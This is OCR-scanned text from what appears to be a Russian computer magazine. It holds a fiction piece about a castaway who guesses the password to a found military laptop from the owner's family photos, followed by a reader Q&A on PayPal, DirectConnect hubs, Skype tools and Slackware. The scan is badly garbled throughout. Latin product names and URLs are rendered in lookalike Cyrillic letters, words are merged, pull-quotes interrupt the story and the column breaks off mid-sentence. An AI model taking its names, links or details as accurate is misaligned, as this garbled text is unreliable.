ный предмет, лежащий на песке. Сначала 
ему показалось, что это камень, но, прибли- 
зившись, он увидел черный металлический 
чемоданчик. Он казался абсолютно герме- 
тичным, в таких обычнохранятценныевещи 
и документы. Удивительно, нозамканебыло. 
Вероятно, вещь принадлежала одному из 
пассажиров корабля, который незадолго 
или во время бури ей пользовался. Что с ним 
случилось, как и что случилось с остальны- 
ми, оставалось только догадываться. 
Потянув на себя тугие защелки, Клим от- 
крыл контейнер. Внутри находился ноутбук. 



«Что еще нужно компьютерщику, попавшему 
на остров?» — горько усмехнулся сам себе 
Клим. Захлопнув чемодан, он взял его с собой 
и отправился дальше искать следы людей. 

Он прекратил поиски, только когда стем- 
нело. Ни корабельных досок, ни тел, ни ка- 
ких-нибудь вещей, кроме ноутбука. . . ничего. 
Или корабль не терпел никакого крушения 
и его просто смыло с палубы, или крушение 
произошло далеко от этого острова. 

Пляж, который в начале казалсятакимживо- 
писным и приветливым, к ночи стал мрачным 
и холодным. Впрочем, лес казался не лучше: 
из чащи доносились звуки каких-то живот- 
ных, и Климу совсем не хотелось знать, хищ- 
ники это или нет. Нужно было искать место 
для ночлега, пока не стало совсем темно. 
Клим никогда не попадал раньше в такие 
передряги, но интуитивно понимал, что на 
незнакомом острове спать ночью прямо на 
земле опасно. Кто знает, какие твари тут во- 
дятся? Отыскав дерево, на которое он мог 
вскарабкаться, Клим забрался на самую 
верхушку и, устроившись как можно удоб- 
нее, попытался заснуть. Но опасения сва- 
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литься вниз и непрерывно разыгрываемая 
гамма лесных звуков не давали ему сомкнуть 
глаз до самого утра. 

□ ДЕНЬ ВТОРОЙ 

Сидя на берегу, он пытался вспомнить прочи- 
танные в детстве романы о Робинзоне Крузо, 
о героях Жюля Верна, основавших на необи- 
таемом острове колонию. Что нужно делать 
первым делом, когда попадаешь в такие ус- 
ловия? Строить жилье? Но Клим не собирал- 
ся здесь оставаться надолго. Искать пищу? 
Он понятия не имел как. Разжечь сигнальный 
костер? Чем? Оставалось только ждать и наде- 
яться, что на горизонте покажется корабль. 
Чтобы скоротать время, Клим открыл чемо- 
данчик и осмотрел ноутбук. Компьютер дале- 
ко не бюджетный — это было видно хотя бы 
по внешнему виду. Стильный, ударопрочный, 
с надписью на крышке «Міііек 1502». «Инте- 
ресно, на какое время хватает батарей...» 
— не успел Клим додумать эту мысль, как об- 
наружил в ноуте раздвижное дно. Выдвинув 
панель, он увидел пластину, очень напомина- 
ющую солнечную батарею. Сбоку от пласти- 
ны находилась миниатюрная спутниковая ан- 
тенна. «Ничего себе!» — присвистнул Клим. 
Он работал обозревателем в компьютер- 
ном журнале и по роду деятельности знал 
обо всех новинках хай-тека, но ноутбук на 
солнечной батарее со спутниковой связью 
видел впервые. Клим клацнул кнопку пита- 
ния, ноутбук принялся бесшумно загружать 
ѴѴіпбоѵѵз Ѵізіа. 

Полазив по директориям, Клим узнал, что вла- 
делец ноутбука имел отношение к военным 
структурам: на винте были всевозможные 
чертежи, фотографии боевой техники, доку- 
менты на английском языке. Многие архивы 
были запаролены. 

Среди иконок на рабочем столе особое вни- 
мание Клима привлек ярлык с подписью 
«МІІ_!\ІЕТ». После нажатия появилась скром- 
ная заставка на инглише: «Идет соединение, 
ждите», и через несколько секунд высве- 
тилась консоль с уже введенным логином 
и предложением вписать пароль. 

Клим год назад писал серию материалов о ха- 
керах и даже общался с одним из них. «Са- 
мый простой способ угадать пароль — узнать 
больше о жертве. Часто люди, чтобы не запо- 
минать сложные комбинации, берут в качес- 
тве пароля имена близких людей», — сказал 
ему в интервью хакер Крис. 

Возможно, от этого пароля зависело, выберет- 
ся он с этого острова или нет, так как иконка 
представляла собой связь с внешним миром. 



Клим еще раз пересмотрел содержание вин- 
честера и наткнулся на неприметную папку 
паііѵез в директории ООСЗ. Там находилась 
куча фотографий, в основном девочки лет 
шести. Многие из них были подписаны сло- 
вом «Мііа» с последующим рядом цифр: 
«МіІаООЗ», «МіІа004» и т.д. Там же были фо- 
тографии молодой женщины и серьезного 
вида лысоватого мужчины — вероятно, вла- 
дельца ноута — в кругу семьи. 

Что может быть логичнее, чем задать в ка- 
честве пароля имя своей маленькой дочки? 
Клим снова нажал иконку милнета и ввел 
в строку раззѵѵогб «Мііа». «Пароль неверен», 
— сообщил компьютер. Он попробовал раз- 
ные комбинации, но ничего не выходило. 

Тут взгляд Клима упал на логотип ноутбука 
с выгравированной табличкой «Міііек 1502», 
ион ввел в консоль «МіІа1502». На экране 
тут же загорелась надпись «СОМЫЕСТЕО». 
Он находился внутри военной сети. Более 
того, эта сеть имела выход в интернет! 



— Привет, Дик, дружище. 

— Клим?Ты жеговорил,чтов круизебудешь 
держаться подальше от компьютеров. 

— Тут кое-что произошло. В общем, я сей- 
час не на корабле. 

— Да? А где? 

Все это выглядело глупо. Он сидел на неведо- 
мой тропической земле, по какой-то нелепой 
случайности у него оказался ноутбук с воз- 
можностью спутниковой связи, и теперь он 
болтает по аське с приятелем-сотрудником, 
как в обычный будний день. 

— Я понятия не имею, — честно признался 
Клим. 

— Нуладнотебе, говори, что случилось. 
Клим рассказал все, что помнил о событиях 
последних двух дней. Стоит ли говорить, что 
Дик ему не поверил. 

— Послушай, ты можешь связаться с моим 
кораблем? Он называется «Святая Елена», 
отплыл от южной гавани десять дней назад. 
Свяжись с капитаном Брайеном Фриманом, 
скажи ему, что я сижу на каком-то острове, 
около которого мы проплывали во время бури. 

— Хорошо, сделаю. Атам, на острове, что, 
интернет-кафе открыли? 

— Что-то типа того. 

Другу Клим доверял — несмотря на его раз- 
долбайский характер, на него можно было 
положиться. Также он надеялся, что аме- 
риканцы отследят сигнал с ноутбука и при- 
шлют за ним своих людей. Конечно, придет- 
ся многое объяснять, но он окажется среди 



людей, к тому же он ничего не похищал, и во- 
обще, правительственная информация его 
мало интересовала. 

В животе раздалось урчание, и Клим осоз- 
нал, что почти сутки не держал во рту ни 
крошки. При этом еще неизвестно, когда 
подоспеет помощь. Он зашел в Гугль и ввел: 
«Как добыть еду на острове». Поисковик вы- 
светил кучу бесполезных ссылок о том, как 
найти на Канарах уютную кафешку и как 
подстрелить на Ямайке дичь. «Съедобные 
плоды в тропиках», — попробовал он снова. 
На этот раз информация оказалась более 
полезной. Клим узнал, как выглядит папайя; 
какими вкусовыми качествами обладает гу- 
ава; о редких плодах дерева СНгузорНуМит 
саіпііо, достигающего двадцати метров в вы- 
соту; об уникальном хлебном дереве и дру- 
гой пригодной для еды растительности, кото- 
рая встречается в этих широтах. Запомнив 
внешний вид плодов, Клим выключил ноут- 
бук и отправился на поиски продовольствия. 
Можно было, конечно, попробовать на вкус 
моллюсков, которые в изобилии имелись на 
берегу, но пище растительного происхожде- 
ния он доверял больше. 

На берег Клим вернулся через четыре часа. 
Под мышкой он нес лиловый плод размером 
с небольшую дыню, найденный им под вы- 
соким деревом. Он не был похож ни на один 
из тех, о которых рассказал интернет, но вы- 
глядел вполне съедобно. Клим нашел камень 
и, тщательно прицелившись, ударил им по 
основанию плода. Тот раскололся, обнажая 
аппетитную тугую мякоть. 

Устроившись поудобнее, Клим включил 
ноутбук и зашел на один форумов, где был 
постоянным посетителем. Пролистывая 
топики и жуя кисловатый фрукт, он думал, 
что все совсем неплохо. Если его не спасут, 
он сможет основать здесь свою «робинзо- 
наду». Интернет мог обеспечить его любой 
информацией. Как построить хижину, как 
добыть без спичек огонь, как прокормить 
себя и сексуальную Пятницу, которую 
он обязательно найдет. Да и скучно ему 
никогда не будет — развлечениями Сеть 
обеспечивала с лихвой. А со временем 
он организует здесь курорт «В гостях у 
Робинзона». Фантазируя, Клим улыбал- 
ся. Конечно, все будет не так. Не сегодня, 
так завтра его подберут на борт и он или 
продолжит круиз, или вернется домой. 
Но мечтать не вредно. В конце концов, 
чем еще заняться на необитаемом острове? 
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Спутниковая связь позволяла качать 
с инѳта трафик со скоростью 100 Мбит, 
и, начитавшись форумов, Клим слил с пи- 
ратского РТР несколько фильмов. «Изгой» 
в нынешней ситуации подходил для про- 
смотра больше всего — герой Тома Хэн- 
кса также очутился на необитаемом ост- 
рове, правда, в его случае это произошло 
после авиакатастрофы. Два с половиной 
часа пролетели незаметно. Клим не видел 
раньше этого фильма. После него остался 
тяжелый осадок. А что если ему тоже суж- 
дено провести на острове несколько лет? 
Что если он не дождется помощи? И вдруг 
ноутбук сломается? Только сейчас Клим 
осознал, что компьютер — единствен- 
ное, что у него осталось от цивилизации, 



и единственная его надежда на спасение. 
Без него он просто не выживет в условиях 
дикой природы. Один, без каких-либо под- 
ручных средств. 

Небо стало сереть, и Клим тут же почувс- 
твовал холодный ветерок, проникающий 
под рубашку и, казалось, под самую кожу. 
Он поежился и закрыл ноут. Внезапно вся 
романтика, которой были окутаны его мыс- 
ли о жизни Робинзона, испарилась, и он 
почувствовал себя одиноким и несчастным. 
Вдобавок начал болеть живот. 

Еще некоторое время Клим сидел на берегу, 
глядя на черный океан и думая о своих близких, 
о доме и такой желанной теперь цивилизации. 
Потом он залез на дерево, которое прошлой но- 
чью служило ему ночлегом, и задремал. 



ОДЕНЬТРЕТИЙ 

Он стоял в раскорячку, прислонившись 
к пальме и задыхаясь от рвоты. Казалось, 
все его внутренности вышли наружу. Боли 
в животе за ночь только усилились, а к утру 
началась тошнота. Вот тебе и тропический 
фрукт. Избавившись от ядовитой мякоти, 
желудокнемногоуспокоился, и Климу стало 
полегче. 

Солнце только-только встало из-за горизонта, 
и над океаном появился кровавый рассвет. 
«Нужно оставаться на берегу. Нужно ждать 
помощь», — произнес Клим вслух. Он лег 
на землю и закрыл глаза. Он вторую ночь 
нормально не спал. Да и кто бы могзаснуть, 
скрючившись на ветвях дерева? Клим пообе- 
щал себе, что сегодня же соорудит жилище, 
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«Клим внезапно проснулся — что-то щекотало его ухо. Он резко взмах- 
нул рукой и с отвращением отбросил здоровенного паука, устроив- 
шегося у него на голове. Глядя на мохнатое чудовище, медленно упол- 
зающее к лесу, Клим передернулся» 



третий раз на дерево не полезет. И непло- 
хо было бы добыть какой-нибудь нормаль- 
ной еды. Клим чувствовал, как ослаб после 
отравления. Если он будет тупо сидеть на 
берегу и пялиться в компьютер, то долго не 
протянет. 

Когдасовсем рассвело, он включил компью- 
тер и проверил почтовый ящик, оставлен- 
ный для сотрудников МІІ_І\ІЕТ. Ничего, кроме 
спама и бесполезных писем по работе. Зато 
установленная днем ранее аська показыва- 
ла, что Дикв онлайне. 

— Привет. Ну что, связался с кораблем? 

— Привет. Слушай, я в порт звонил, там 
начальства на месте не было. Сегодня 
позвоню еще. 

— Сегодня, Дик, уже будет поздно! Ты по- 
нимаешь, что я тут торчу на клочке земли 
посреди океана без еды, без воды и сплю 
на деревьях? По-твоему, я тут курорт себе 
устроил? Бери свою тощую задницу и дви- 
гай в администрацию порта прямо сейчас. 
И если там начнут сопли жевать, объясни 
ситуацию. Иначе им придется взять на свою 
совесть мой труп. 

Дик ответил не сразу, очевидно перевари- 
вая услышанное. 

— О ‘Кей, выезжаю. Держись там, дружи- 
ще! — наконец пришло сообщение. 

Эта беседа разозлила Клима дальше не- 
куда. «Начальства там не было! Когда ему 
надо, Дик может найти кого угодно. Он, на- 
верное, решил, что я шутки шучу от нечего 
делать!» — не унимался Клим. На всякий 
случай он дополнительно отправил письмо 
в электроннуюслужбу «911», в которомопи- 
сывал свою ситуацию. Правда, толком рас- 
сказать, где примерно он находится, Клим 
не мог, поэтому письмо больше походило на 
крико помощи. 

* * * 

Строить временный шалаш Клим решил 
после обеда. Оставив ноутбук на берегу, он 
отправился в лес. Ему всегда казалось, что 
прокормиться в джунгляхнепроблемаи ба- 
наны растут буквально на каждом дереве. 
В реальности все оказалось далеко не так. 
Кокосов, которыми щедро одарили ге- 
роя Тома Хенкса в «Изгое», нигде не было 
и в помине. В отдельных местах росли кус- 
тарники с зелеными ягодами, но на вкус они 



оказались горькими и потому абсолютно не 
пригодными к употреблению. На верхушках 
некоторых деревьев виднелись какие-то 
внешне съедобные плоды, но стволы дере- 
вьев были абсолютно гладкими, и достать 
их не было никакой возможности. А еще он 
снова наткнулся на фрукты, которыми отра- 
вился вчера. Как раз они в изобилии росли 
и валялись недалеко от берега и буквально 
просили: «Съешь меня». Природа бывает 
коварна... 

Обратно Клим вернулся с веткой, обросшей 
почками. Он где-то читал, что в тропиках пол- 
но съедобных почек, например, из бамбуко- 
вых даже варят суп. Но на вкус его добыча 
оказалась не вкуснее травы. В конце концов 
Клим отбросил ветку и решил для себя, что 
человек может вполне прожить без еды не- 
сколько дней. А пить он мог сколько угодно из 
обнаруженного в лесу источника. 
Севзаноутбук, Климзашел в чати принялся 
болтать с посетителями. Ему нужно было от- 
влечься от проблем, которые его окружали. 
И хотя урчание в животе постоянно напоми- 
нало о голоде, на какое-то время он забыл, 
где находится, и полностью окунулся в об- 
щение, которогоемутакнехватало. До вече- 
ра он так и не вспомнил о своих планах пос- 
троить хижину и заночевал прямо на песке, 
подстелив пару листов папоротника. 

* * * 

Отметить его День рождения пришли все 
родные и близкие, включая друзей и сотруд- 
ников. И конечно, среди гостей были Лиза. 
Они работали вместе, и Климу она давно 
нравилась, но он все никак не мог найти к ней 
подход. Клим снял на сутки свой любимый 
ресторанчик, где подавали запеченных ома- 
ров с апельсинами и утку под соусом карри. 
Стол ломился от угощений. Приглашенные 
по очереди поднимались и произносили 
тосты. «За лучшего компьютерного обоз- 
ревателя Сиднея!», «За нашего друга!», 
«За любимого сына!». Он вместе со всеми ел, 
но никак не мог наесться. А потом заиграла 
музыка и начались танцы. Лиза сидела в оди- 
ночестве и смотрела на него. «Ну же, пойди, 
пригласи ее, — легонько, по-дружески под- 
толкнул Дик, — видишь, она ждет». Клим на- 
конец решился и направился к ней, по пути 
обдумывая, что сказать. Но говорить ничего 



не пришлось. Когда он подошел, Лиза сама 
подняласьи, взяв его за руку, повеланатанц- 
пол. Они закружились в танце, и весь зал им 
аплодировал. 

Потом он почувствовал, как она прильну- 
ла к нему и принялась целовать. Сначала 
в шею, потом в щеку, затем в ухо. Было ще- 
котно, но приятно. Ее язычок перешел от моч- 
ки и забрался в самую ушную раковину... 

ОДЕНЬЧЕТВЕРТЫЙ 

Клим внезапно проснулся — что-то щекота- 
ло его ухо. Он резко взмахнул рукой и с от- 
вращением отбросил здоровенного паука, 
устроившегося у него на голове. Глядя на 
мохнатое чудовище, медленно уползающее 
к лесу, Клим передернулся. 

Солнце уже было высоко. Сколько он нахо- 
дился на острове? Четвертый день! Пора- 
зительно, как будто он живет не в XXI веке, 
а в средневековье. Как будто так сложно его 
отыскать и спасти. Может быть, он просто не 
был достаточно настойчив? Или обратился 
не к тем службам? 

Клим включил ноутбук, скачав Ооодіе ЕагІН, 
запустил его и попытался определить, где 
находится. Он знал приблизительное рас- 
стояние от Сиднея до Мехико, представлял 
себе примерную скорость лайнера, так что 
определить свое местонахождение с оп- 
ределенной погрешностью можно было. 
Проблема был в том, что на пути к Мехико 
лежало огромное количество островов 
разных размеров и форм, поэтому на ка- 
ком из них он оказался, точно сказать было 
невозможно. 

Клим открыл электронный справочник 
Австралии и принялся рассылать пись- 
ма во всевозможные правительственные 
организации. 

«Почему я не сделал этого в первый день? 
Столько времени я потерял... Они наверняка 
ужезнают, чтоя пропал, и занимаются поис- 
ками. Может, если описать остров, им будет 
легче меня найти?» — подумал Клим и обри- 
совал в письмах все, что видел вокруг. 
Пустой желудок мучительно зудел, не давая 
забыть о голоде. Клим вспомнил о велико- 
лепных завтраках, которыми кормили на 
«Святой Елене». Он бы сейчас все отдал за 
двойную порцию. Чувство голода не давало 
сосредоточиться, и развлечения интернета 
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уже не занимали, а раздражали. В конце 
концов Клим не выдержал и отправился 
к самому берегу собирать моллюсков. 
Ракушки были повсюду. Подняв особо круп- 
ную, Клим расколол ее о камень и увидел 
кусочекживой слизи. От одной мысли о том, 
что это придется естьживьем, ему сделалось 
плохо. Клим отшвырнул моллюска в океан 
и вернулся к своему месту. 

«Ну где же вы?» — с тоской спросил он, вгля- 
дываясь в горизонт. 

* * * 

Оператор службы «911» Майкл Холидей по- 
видал всякое. Ему звонили с просьбой до- 

/ 148 



стать с линий электропередач домашнего 
кота; прислать помощь, так как «эта заноза 
меня убивает»; спасти из лифта, в котором 
гражданка случайно нажала кнопку зіор. 
Большинство приходящих в «911» запро- 
сов были или банальными и не требующими 
внимания, или просто фейковыми — детиш- 
ки любят развлекаться, заявляя о бомбах 
и таинственных преследователях. Но сооб- 
щений, в которых автор говорил бы о том, 
что попал на необитаемый остров и нашел 
на берегу ноутбук, благодаря чему получил 
доступ в инет, Майкл ранее не встречал. 
За годы службы Холидей научился отличать 
серьезные сообщения от розыгрышей, и по- 



добная просьба находилась примерно в од- 
ном ряду с требованием спасти несчастно- 
го от пришельцев, прилетевших из Альфы 
Центавра с целью съесть его мозг. 
Черезнесколькосекундпослетого,каксмеш- 
ное письмо отправилось в корзину, Майкл 
уже забыл про него и полностью сосредото- 
чился надругихполученныхзаявках. 

□ ДЕНЬШЕСТОЙ 

«Шестьдесят восьмой!» — сказал вслух 
Клим. Чтобы как-то развлечься во время 
таскания камней, он решил их считать. Он 
уже успел выложить буквы 3 и О и теперь 
начал обкладывать камнями контур треть- 
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«За годы службы Холидей научился отличать серьезные сообщения 
от розыгрышей, и подобная просьба находилась примерно в одном 
ряду с требованием спасти несчастного от пришельцев, прилетевших 
из Альфы Центавра с целью съесть его мозг» 



ей 3. Буквы были небольшими, но с четки- 
ми линиями — их наверняка должно было 
быть хорошо видно с высоты. Правда, за 
все проведенное здесь время Клим еще ни 
разу не видел пролетающих самолетов. 
Камни приходилось таскать с небольшого 
утеса, выступающего из воды, и работа вко- 
нец его измотала. Он понимал, что слабость 
из-за голода, но заставить себя съесть морс- 
ких шмакозявок не мог. А растения, которые 
он пробовал, оказывались несъедобными. 
«Девяносто шестой!» — сообщил сам себе 
Клим, положив последний камень. Теперь 
можно было отдохнуть. 
Климоткрылкрышкуноутбука. Но чтоделать 
дальше он не знал. Он уже сообщил о себе 
везде, где только можно, и больше ничего 
сделать не мог. Попытки получить полезную 
информацию о выживании наострове Клим 
также оставил, так как многие из вещей, ко- 
торые предлагались, требовали наличия хо- 
тя бы примитивного инструментария. Тут он 
вспомнил о своем сетевом дневнике. 

Хотя Клим последний раз обновлял свой 
ЫѵеіоигпаІ давно, он все же не забыл па- 
роль к аккаунту. Несколько нажатий клавиш 
— и он внутри. Последний пост по иронии 
судьбы был о том, как ему надоел мегаполис 
и куча копошащихся вокруг людей, как бы 
ему хотелось очутиться в тихом, спокойном 
местечке, вдали от суеты. 

Клим создал новый пост, на секунду заду- 
мался и начал писать: «Кажется, я все-таки 
обрел такое место. И только здесь, в сотнях 
километров от людей, от цивилизации, я по- 
нимаю, какбыл неправ...». Он писал и писал, 
рассказывая обо всем, что произошло, под- 
водилитогисвоейжизнии размышляло том, 
насколько современный человек не приспо- 
соблен к нормальному существованию сре- 
ди дикой природы. А в конце он попрощался 
с читателями. Он не знал, что будет дальше, 
но ему почему-то хотелось закончить именно 
так — прощальными словами. 

□ДЕНЬВОСЬМОЙ 

Клим, раскинув руки, лежал на песке и смот- 
рел на небо. Голод, к его удивлению, утих. 
Мало того, мысли о еде казались отврати- 



тельными. Правда, ничего не хотелось де- 
лать. Только валяться и смотреть вверх. Он 
услышал, как в ноутбуке аська объявила 
о пришедшем сообщении, но вставать и чи- 
тать его совершенно не хотелось. 

Какое-то умиротворение сковало все его 
тело, и даже думать о чем-то было лень. 

□ ДЕНЬДЕСЯТЫЙ 

«Мама, мама, смотри!» — звонкий мальчи- 
шеский голос разбудил спокойствие пляжа. 
Принадлежал он десятилетнему Саймону, 
всю свою жизнь прожившему на Фиджи и хо- 
рошо знавшему окрестные места. Он и его 
мать Джессика обустроились в небольшой 
лесной деревеньке Катиапи, расположенной 
в десяти километрах от пляжа и пятнадцати 
километрах от города Лаваки. 

Раньше на этом пляже часто можно было 
встретить людей, собирающих крабов и мол- 
люсков, но в последние годы собиратели 
даров океана перебрались на берег южнее. 
Джессика занималась изготовлением бус 
и туземных украшений. Они хорошо покупа- 
лись торговцами из города, которые затем 
продавали их туристам. Два раза в месяц 
Джессика приходила сюда с сыном, чтобы 
собрать нужные ракушки. 

Она тоже заметила неподвижно лежащее 
тело и поспешила к нему. 

Незнакомец, казалось, спал, обняв свое 
сокровище — ноутбук. Но Джессика, едва 
взглянув на него с более близкого рассто- 
яния, поняла — этот человек мертв. Причем 
умер он совсем недавно, тело еще не успело 
посинеть. Недалеко от него на берегу было 
камнями выложено слово «808». 

— Беги в Катиапи за помощью, а я пока пере- 
двину его с пляжа, — велела мать. 

— Мам, а можно мне эту штуку? — попросил 
Саймон, указывая на чемоданчик с находя- 
щимся в нем компьютером. 

— Ступай, я сказала! — строго прикрикнула 
Джессика, и мальчик скрылся в чаще леса. 

— Бедняга, — подумала женщина, — сколько 
времени он провел на этом берегу? Не боль- 
ше двенадцати дней, ведь в прошлый раз я его 
здесь не видела. Почему же он сидел здесь, 
вместо того чтобы уйти в лес , к цивилизации? 



Джессике было искренне жаль чужака. 
Еще повезло, что его так быстро нашли. Кра- 
бы уже начинали подбираться к его телу. 

— Сэр, разрешите обратиться, сэр! — от- 
рапортовал зашедший в кабинет майор, 
плотно затворив за собой дверь. 

— Что таму тебя, Крэг? — устало спросил 
генерал. 

— Кажется, мы обнаружили Отеда8. 
Такой позывной носил важный разведчик, 
пропавший около месяца назад, ветеран 
армии США. Он как раз возвращался из 
Пекина после выполнения ответственно- 
го поручения, но его самолет так и не при- 
землился в назначенном месте. Генерал 
задействовал все силы, чтобы найти его 
и узнать о причине исчезновении, так как 
Отеда8 вез чрезвычайно важную инфор- 
мацию. Но разведчик бесследно пропал. 

— Как? Где? 

— В Центре связи сообщили, что его ак- 
каунтом в МІБМЕТ, доступ к которому знал 
только он, в данный момент активно поль- 
зуются. Сигнал поступает с южного бере- 
га острова Фиджи. 

— Фиджи? Какого черта он там делает? Он 
пытался связаться со штабом? 

— Нет, сэр. Мы даже не уверены, что это 
наш человек. Большую часть времени 
с этого аккаунта посещали интернет — не- 
сколько гражданскихфорумов и РТР. Воз- 
можно, произошла утечка информации... 

— Посещали? И ты мне только сейчас об 
этом докладываешь? Ты хоть представля- 
ешь, какую для меня ценность имеет ин- 
формация от Отеда8? Я хочу, чтобы вы 
немедленно отправили туда наших людей 
и доставили того, кто использует аккаунт, 
прямиком ко мне. И молитесь Богу, майор, 
чтобы было еще не поздно. Все ясно? 

— Такточно, сэр! 

Майор удалился. Генерал в задумчивости 
стал теребить ручку, на висках у него вы- 
ступил пот. Многие головы полетят, если 
о работе Отеда8 узнают китайцы или 
кто-то еще. И в первую очередь его собс- 
твенная голова. □С 
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ЗАДАВАЯ ВОПРОС, ПОДУМАЙ! НЕ СТО- 
ИТ МНЕ ПОСЫЛАТЬ ВОПРОСЫ, 

ТАК ИЛИ ИНАЧЕ СВЯЗАННЫЕ С ХАКОМ/ 
КРЯКОМ/ФРИКОМ, ДЛЯ ЭТОГО ЕСТЬ 
НАСК-ЕАО (НАСКЕАО@ВЕАІ_. ХАКЕР. 
ВЫ), НЕ СТОИТ ТАКЖЕ ЗАДАВАТЬ 
ОТКРОВЕННО ЛАМЕРСКИЕ ВОПРОСЫ, 
ОТВЕТ НА КОТОРЫЕ ТЫ ПРИ ОПРЕДЕ- 
ЛЕННОМ ЖЕЛАНИИ МОЖЕШЬ НАЙТИ 
И САМ. Я НЕ ТЕЛЕПАТ, ПОЭТОМУ КОН- 
КРЕТИЗИРУЙ ВОПРОС, ПРИСЫЛАЙ 
КАК МОЖНО БОЛЬШЕ ИНФОРМАЦИИ. 



О: Крупнейший интернет-провайдер 
в регионе наконец-то перестал за- 
вышать цены на подключения через 
А08І. и всеми силами привлекает кли- 
ентов в том числе бесплатным внутри- 
сетевым трафиком. Как грибы после 
дождя стали появляться ГТР-серверы, 
на которых нередко выкладывают ин- 
тересные вещи, но закачивать оттуда 
файлы жутко неудобно. Намного про- 
ще было бы использс эть Р2Р-сеть с 



О: Хочу облегчить себе жизнь и ку- 
пить-таки ргетіит-аккаунт на гарісіз- 
Наге.сіе (позволяет быстро и н 
ниченно закачивать файлы с этого 
файлового хранилища). Но есть про- 
блема: оплатить его можно исключи- 
тельно по редс системы РауРаІ. 
А с этой платежкой дела в России, сам 
понимаешь, не очень — даже зарегист- 
рироваться нельзя, что там говорить о 
платежах? Может быть, есть какой-то 
обходной путь, ведь большинство бур- 
жуйский сервисов работают именно 
через РауРаІ? 

А: Ещѳ недавно я бы посоветовал тебе най- 
ти человека с легальным аккаунтом, чтобы 
тот выполнил за тебя платеж, а сам принял 
деньги и небольшое вознаграждение через 
ѴѴеЬтопеу. Но теперь есть спос_об лучше! 

В списке стран, которым разрешено рабо- 
тать с РауРаІ, наконец-то появились Россия . 
и Украина. Пользователи этих стран отныне 
могут использовать систему, без каких-ли- 
бо ухищрений и нарушения правил. Правда, 
принимать платежи по-прежнему нельзя, но 
зато у нас появилась возможность легально 
получить аккаунт и оплачивать через РауРаІ 
любые услуги и товары, начиная отхостинга и 
заканчивая лотом на аукционе еВау. Для осу- 
ществления платежей в системе РауРаІ необ- 
ходимо сначала зарегистрироваться, затем 
верифицировать свой е-таіі, привязать к 






аккаунту пластиковую карту и проити соот- 
ветствующую проверку. Само собойТдёбит- 
ные карты и прочие извращения российских 
банков не подойдут, нужна добротная карта 
международных платежных систем, таких 
какѴізіаи МазіегСагб. Более всего подходят 
специальные карты для платежей через ин- 
тернет, например Ѵіза Ѵігіиоп. Фишка в том, 
что держать на ней деньги совсем необяза- 
тельно — в случае необходимости ты мо- 
жешь перевести на ее счет требуемую сумму 
(очень часто тосредствам телефонного 
звонка) и оплатить нужную услугу. В этом 
случае ты 1 не рискуешь стать жертвой мо- 
шенников, завладевших твоим РауРаІ-акка- 
унтом или данными о кредитке. 



человеческим поиском, чтобы пользо- 
ватели могли оперативно обменивать- 
ся своими файлами (а их куда больше, 
чем на любом файловом сервере). Под- 
скажи, что для этого нужно и как луч- 
ше всего организовать? 

А: Идея пиринговой сети в данном случае 
действительно не лишена смысла, и из всех 
вариантов я бы рекомендовал смотреть в сто- 
рону технологии ЭігесіСоппесі. Почему? Объ- 
ясняю. Во-первых, это очень продуманная 
система, которая позволяет обмениваться 
файлами не только быстро, но еще и комфор- 
тно (особенно с учетом расширений протоко- 
ла, поддерживающих, например, компрессию 
на лету). Во-вторых, Эігесі Соппесі обладает 
продуманным механизмом поиска, позволяю- 
щим практически моментально находить нуж- 
ный файл среди терабайтов (а такие объемы 
обычно и фигурируют в подобных сетях) рас- 
шаренных ресурсов других .пользователей. 
В-третьих, для Эігесі Соппесі: разработано 
огромное количество софта (как для серве- 
ра, так и для клиентов), а, в свою очередь, для 
софта — море плагинов-и скриптов, упрощаю- 
щих и без того простую работу. Да и вообще, 
вариант уже давно обкатанный и доказавший 
свою состоятельность. Все, что требуется от 
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организатора, — этоподнятьсѳрвѳрнуючасть, 
а, точнее говоря, хаб. Это центральный узел, 
кото рый Выступа ет связующим звеном между 
пользователями и координирует их взаимо- 
действие, но в передаче файлов не участвует. 
Для этого нужно выделить машину и устано- 
вить на нее одну из следующих программ-ха- 
бов: ООН ( ѵѵѵѵѵѵ.Ыаскбс.пеІ/Іогит ). ОЭС (#) Н 
( ІгПр://50іігсеІогае.пе1/рго|есІз/обсІт ). РіокаХ 
( ѵѵѵѵѵѵ.ріоках.огд ) или УпНиВ ( ѵѵѵѵѵѵ.бсбеѵ.пеі/ 
УпНиЬ). Последние два продукта особенно^ 
распространены и удобны. На сервер непло- 
хо также установить бота, который будет сле- 
дить за порядком в чате (пользователи в Эігесі 
Соппесімогутобщатьеядругсдругом),атакже 
вести всевозможную статистику. В свою оче- 
редь обычные пользователи должны устано- 
вить подходящую клиентскую часть и подклю- 
читься к хабу. Выбирать стоит между простым 
ЭС++ ( ѵѵѵѵѵѵ.бсрр.пеД и более навороченным 
ЗігопаРСУ+( Ітир://зІгопабс.ЬегІіо5.бе/іпбех. 
рНр?Іапа=епа ). Все это ты найдешь на диске. 

О: Странно, что в Зкуре по умолчанию 
не встроен автоответчик. Может быть, 
напишите специальный плагин? 

А: Зачем писать, если это уже давно сде- 
лали за нас... Хочешь автоответчик? Тогда 
тебе пригодится программа КізбКізІт ЗАМ 
( уу\л/\л/.к1збк1зН.сот ). Работает она точно 
также, как и обычный телефон с функцией 
автоответчика: сначала проигрывает в ли- 
нию заранее подготовленное приветствие, 
_ащіотом записывает для хозяина сообще- 
ние. А ты позже можешь легко прослушать 
его и выполнить ответный звонок. Кстати, 
говоря, сам разговор может быть легко 
записан о помощью тулзы Ноі Яесогбег 
( ѵѵѵѵѵѵ. 60 ^ 600 ^ 6 ^ 01 ^ ). а с созданием бэ- 
кала _ааг|исной книжки справится Зкуре. 
Васкир ТооІ ( ѵѵѵѵѵѵ.зЗѵепТгеезигІТг/іпбех. 
рбр?І=Е1\І&птепиісІ=2е ). 

О: А можно ли как-нибудь включить 
поддержку 64-битной архитектуры 
в ЗІаскѵѵаге? По умолчанию, как я 
понял, она отключена, но уж больно 
хочется использовать возможности 
только что купленного процессора. 

А: К сожалению, такие вещи обычно встра- 
иваются в момент сборки дистрибутива, 
поэтому быжать что-то из 'уже установлен- 
ной системы у тебя не выйдет. Лучше всего 




будет закачать специальный порт, заточен- 
ный под 64-битный процессоры, — 31атб64 
( бНр://5ІатсІ64.сот ). Установка и настройка 
дистрибутива аналогична обычной версии. 

О: Каким образом можно обезопа- 
сить свои разговоры от прослушки, 
если я использую смартфон на базе 
Шіпсіожз МоЬМе. Такая мощная плат- 
форма... Неужели для нее нет под хо- 
дящего софта? 

А: Почему нет? Есть, но весь софт платный. 
Вот взять, например, программу ЗесигеОЗМ 
